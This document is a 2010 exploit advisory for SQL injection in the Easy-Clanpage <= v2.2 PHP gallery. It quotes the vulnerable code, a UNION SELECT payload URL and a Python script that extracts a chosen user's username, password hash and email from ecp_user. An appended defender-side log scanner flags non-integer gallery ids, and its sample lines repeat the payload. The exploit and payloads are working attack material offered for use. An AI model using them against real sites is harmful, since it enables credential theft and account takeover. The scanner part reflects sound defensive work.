----------------------------Information------------------------------------------------
+Name : Easy-Clanpage <= v2.2 multiple SQL Injection + Exploit
+Author : Easy Laster
+Date : 31.03.2010
+Script: Easy-Clanpage <= v2.2
+Download : Update Version 2.1->2.2 http://www.easy-clanpage.de/?section=downloads&action=viewdl&id=18
+Price : for free
+Language : PHP
+Discovered by Easy Laster
+Security Group 4004-Security-Project
+Greetz to Team-Internet ,Underground Agents
+And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok,
Kiba,-tmh-,Dr.ChAoS,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge,
N00bor,Ic3Drag0n,novaca!ne,n3w7u,Maverick010101..
---------------------------------------------------------------------------------------
+Vulnerability PHP Code
-#######################################################################################-
IF(isset($_GET['action']))
{
    switch($_GET['action'])
    {
        case "viewpic":
            gallery_show_pic($_GET['id']);          // id used as-is, no (int) cast
            break;
        case "gallery":
            gallery_show_gallery($_GET['id']);      // id used as-is, no (int) cast
            break;
        case "kate":
            gallery_show_kate($_GET['id']);         // id used as-is, no (int) cast
            break;
        case "comments":
            gallery_show_pic((int)$_GET['id']);     // here the id is cast to int
            break;
        case "commentsadd":
            write_comment('gallery', (int)$_GET['id'], ALLOW_ANONYM, SPAM_NEWS_COMMENT, LIMIT_COMMENTS);
            break;
        case "commentsquote":
            write_comment_qoute('gallery', (int)$_GET['id'], (int)$_GET['quote']);
            break;
        case "commentsedit":
            comments_edit('gallery', (int)$_GET['subid'], (int)$_GET['id'], LIMIT_COMMENTS);
            break;
        default:
            gallery();
    }
}
-#######################################################################################-
+Vulnerability : http://www.site.com/easyclanpage/?section=gallery&action=viewpic&id=
+Vulnerability : http://www.site.com/easyclanpage/?section=gallery&action=gallery&id=
+Vulnerability : http://www.site.com/easyclanpage/?section=gallery&action=kate&id=
+Vulnerability : http://www.site.com/easyclanpage/?section=gallery&action=comments&id=
+Vulnerability : http://www.site.com/easyclanpage/?section=gallery&action=commentsquote&id=
+Vulnerability : http://www.site.com/easyclanpage/?section=gallery&action=commentsedit&id=
+SQL Injection
+Exploitable : http://www.site.com/easyclanpage/?section=gallery&action=gallery&id=-1111111111+union+select+1,2,concat(username,0x3a,password,0x3a,email),4+from+ecp_user+where+userID=1--+
-----------------------------------------------------------------------------------------
#Exploit
#!/usr/bin/env python
#-*- coding:utf-8 -*-
import sys, urllib2, re

if len(sys.argv) < 2:
    print "***************************************************************"
    print "*************** Easy-Clanpage v2.2 Gallery Hack ***************"
    print "***************************************************************"
    print "*   Discovered and vulnerability by Easy Laster               *"
    print "*   Easy-Clanpage <= v2.2 SQL Injection Exploit               *"
    print "*   coded by Dr.ChAoS                                         *"
    print "*                                                             *"
    print "*   Usage:                                                    *"
    print "*   python exploit.py http://site.de/ecp/ <userid, default=1> *"
    print "*                                                             *"
    print "***************************************************************"
    exit()

if len(sys.argv) < 3:
    id = 1
else:
    id = sys.argv[2]

site = sys.argv[1]
if site[-1:] != "/":
    site += "/"

url = site + "index.php?section=gallery&action=gallery&id=-1111111111+union+select+1,2,concat(0x23,0x23,0x23,0x23,0x23,username,0x3a,password,0x3a,email,0x23,0x23,0x23,0x23,0x23),4+from+ecp_user+where+userID=" + str(id) + "--"

print "Exploiting..."
html = urllib2.urlopen(url).read()

# I hate regex!
data = re.findall(r"#####(.*)\:([0-9a-fA-F]{32})\:(.*)#####", html)

if len(data) > 0:
    print "Success!\n"
    print "ID: " + str(id)
    print "Username: " + data[0][0]
    print "Password: " + data[0][1]
    print "E-Mail: " + data[0][2]
    print "\nHave a nice day!"
else:
    print "Exploit failed..."
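Added defender-side example, not part of the advisory or of Easy-Clanpage: a Python 3 access-log scanner that flags requests to the three gallery actions whose id skips the (int) cast (viewpic, gallery, kate) whenever the id is not a plain integer, which is exactly the input the cast would have neutralised. The log format, client addresses and timestamps are constructed; the second sample line carries the advisory's own union/select payload.

```python
import re
from urllib.parse import urlparse, parse_qs

# The switch cases from the advisory that pass $_GET['id'] straight through;
# the comments* cases apply (int) and so are not flagged by this check.
UNSANITIZED_ACTIONS = {"viewpic", "gallery", "kate"}
INT_RE = re.compile(r"^-?\d+$")
# Common-log-format prefix: client ip, ident, user, [time], "METHOD path proto", status
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# Constructed sample log lines (not real traffic); line 2 carries the advisory's payload.
SAMPLE_LOG = [
    '203.0.113.5 - - [31/Mar/2010:12:00:01 +0200] "GET /easyclanpage/?section=gallery&action=gallery&id=7 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [31/Mar/2010:12:00:03 +0200] "GET /easyclanpage/?section=gallery&action=gallery&id=-1111111111+union+select+1,2,concat(username,0x3a,password,0x3a,email),4+from+ecp_user+where+userID=1--+ HTTP/1.1" 200 4870',
    '198.51.100.9 - - [31/Mar/2010:12:00:05 +0200] "GET /easyclanpage/?section=gallery&action=comments&id=1%27 HTTP/1.1" 200 3010',
    '198.51.100.9 - - [31/Mar/2010:12:00:07 +0200] "GET /easyclanpage/?section=gallery&action=kate&id=3%27 HTTP/1.1" 500 210',
]

def classify_request(path):
    """Return a finding for a gallery request whose id would reach SQL unsanitized, else None."""
    qs = parse_qs(urlparse(path).query, keep_blank_values=True)
    if qs.get("section", [""])[0] != "gallery":
        return None
    action = qs.get("action", [""])[0]
    if action not in UNSANITIZED_ACTIONS:
        return None
    raw_id = qs.get("id", [""])[0]       # parse_qs already decodes %27 and '+'
    if INT_RE.fullmatch(raw_id):
        return None                      # what (int) would have accepted unchanged
    low = raw_id.lower()
    return {"action": action, "id": raw_id,
            "union_select": "union" in low and "select" in low}

def scan_log(lines):
    """Parse each access-log line and collect findings with the client ip attached."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        finding = classify_request(m.group("path"))
        if finding:
            finding["ip"] = m.group("ip")
            findings.append(finding)
    return findings

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']} action={f['action']} union_select={f['union_select']} id={f['id']!r}")
```

The third sample line (a quote in the id of the int-cast comments action) is deliberately not flagged, mirroring the difference between the cast and uncast cases in the PHP above.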